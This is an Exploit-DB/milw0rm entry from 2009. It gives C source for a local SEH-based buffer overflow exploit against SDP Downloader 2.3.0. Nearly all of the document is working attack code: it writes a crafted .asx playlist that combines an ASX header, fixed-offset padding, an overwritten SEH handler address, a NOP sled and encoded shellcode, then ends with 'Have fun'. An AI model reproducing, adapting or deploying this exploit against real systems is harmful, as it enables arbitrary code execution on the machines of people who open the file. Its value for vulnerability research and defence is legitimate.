SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)

EDB-ID:

8540

Author:

SimO-s0fT

Type:

local

Platform:

Windows

Published:

2009-04-27

/*  SDP-BOF.c
 *  SDP Downloader Local Buffer overflow exploit [SEH]
 *  Credits : Cyber-Zone
 *  Exploit BY :
 *              SimO-s0fT           (maroc-anti-connexion@hotmail.com)
 *  Shoot to :  Stack & r1z &  Str0ke
 *                         
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET     529
#define NOP        0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";

char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a";

int main(int argc, char *argv[]){
    FILE *p;
    unsigned char *buffer;
    int n_seh=0x909010eb;
    int seh=0x7C87DE34;
    int i=0;
if(argc!=2){
          fprintf(stdout,"_______________________________________________________________________\n");
          fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n");
          printf("\tUSAGE : %s filename.asx\n",argv[0]);
          fprintf(stdout,"_________________________________________________________________________\n");
          }   
if((p=fopen(argv[1],"w+b"))==NULL){
                               perror("error");
                               return EXIT_FAILURE;
                                      }
buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2));
memcpy(buffer,head1, strlen(head1));
i=OFFSET;
memcpy(buffer+strlen(head1)+i, &n_seh,4);
i+=4;
memcpy(buffer+strlen(head1)+i,&seh,4);
i+=4;
memset(buffer+strlen(head1)+i,0x90,10);
i+=10;
memcpy(buffer+strlen(head1)+i,scode,strlen(scode));
i+=strlen(scode);
memcpy(buffer+strlen(head1)+i,head2,strlen(head2));
i+=strlen(head2);

fputs(buffer,p);
fclose(p);
printf("%s has benn created !! \n Have fun \n DONE");
return 0x0;
}

// milw0rm.com [2009-04-27]